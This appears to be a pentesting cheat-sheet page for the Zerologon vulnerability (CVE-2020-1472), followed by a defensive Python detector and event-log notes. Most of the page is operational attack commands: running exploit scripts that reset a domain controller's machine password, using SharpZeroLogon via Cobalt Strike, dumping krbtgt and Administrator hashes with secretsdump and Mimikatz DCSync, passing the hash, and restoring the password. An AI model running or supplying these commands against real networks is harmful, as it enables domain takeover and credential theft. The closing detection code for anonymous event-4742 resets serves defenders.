# CVE-2020-1472

**Detection**

```
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
```

**cve-2020-1472-exploit.py - Python script from dirkjanm**

```
git clone https://github.com/dirkjanm/CVE-2020-1472.git
# Activate a virtual environment to install impacket
>python3 -m venv venv
>source venv/bin/activate
>pip3 install .
>proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5
# Look up the DC's old NT hash
>proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
# Restore the password recovered with secretsdump
# When dumping local registry secrets on a recent version, secretsdump automatically dumps the plaintext machine password (hex encoded)
python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
deactivate
```

**nccfsas - .NET binary for Cobalt Strike's execute-assembly**

```
>git clone https://github.com/nccgroup/nccfsas
# Check
>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
# Reset the machine account password
>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
# Test from a machine that is not joined to the domain
>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch
```

**Mimikatz - 2.2.0 20200917 zerologon**

```
privilege::debug
# Check
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
# Exploit, setting the password to empty
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
# Run dcsync to dump the hashes
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
# PTH
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
# Use the IP address instead of the FQDN to force NTLM through the Windows API
# Reset the password to Waza1234/Waza1234/Waza1234/
# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
lsadump::postzerologon /target:10.10.10.10 /account:DC01$
```
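A defender-side companion to the detection step at the top of the page: the machine-account password reset performed by the tools above is recorded in the DC's Security log as event 4742 ("A computer account was changed") whose Subject is ANONYMOUS LOGON (well-known SID S-1-5-7) and whose target is the DC's own machine account. This is an added example, not code from the page or from any of the listed tools; the event records are constructed and the DC account list is an assumption.

```python
from typing import Dict, Iterable, List

# Constructed sample records (not real logs), using the field names of
# Windows Security event 4742. A Zerologon-style reset leaves Subject =
# ANONYMOUS LOGON and "Password Last Set" changed from "-" to a timestamp.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # the pattern left by the exploit: anonymous subject, DC's own account, password set
    {"EventID": "4742", "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "PasswordLastSet": "9/17/2020 10:05:12 AM"},
    # routine machine password rotation, performed by the account itself
    {"EventID": "4742", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1000", "SubjectUserName": "DC01$",
     "TargetUserName": "DC01$", "PasswordLastSet": "9/17/2020 10:00:00 AM"},
    # anonymous change of a workstation attribute, password untouched
    {"EventID": "4742", "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "WS05$", "PasswordLastSet": "-"},
    # unrelated anonymous logon event
    {"EventID": "4624", "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "PasswordLastSet": "-"},
]

# Assumed set of domain controller machine accounts (hypothetical names).
DC_ACCOUNTS = {"DC01$", "DC02$"}

ANONYMOUS_LOGON_SID = "S-1-5-7"


def is_zerologon_reset(event: Dict[str, str], dc_accounts: Iterable[str]) -> bool:
    """True when a DC machine-account password was changed by ANONYMOUS LOGON."""
    dcs = {a.upper() for a in dc_accounts}
    return (
        event.get("EventID") == "4742"
        and event.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
        and event.get("TargetUserName", "").upper() in dcs
        and event.get("PasswordLastSet", "-") != "-"
    )


def find_zerologon_resets(events: Iterable[Dict[str, str]],
                          dc_accounts: Iterable[str]) -> List[Dict[str, str]]:
    """Return every event matching the anonymous DC password-reset pattern."""
    return [e for e in events if is_zerologon_reset(e, dc_accounts)]


if __name__ == "__main__":
    for hit in find_zerologon_resets(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"ALERT: {hit['TargetUserName']} password reset by "
              f"{hit['SubjectUserName']} at {hit['PasswordLastSet']}")
```

On DCs carrying the August 2020 Netlogon update, the earlier signal is Netlogon events 5827-5829 (vulnerable secure-channel connections denied or allowed), which fire on the connection attempt itself rather than on the completed reset.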
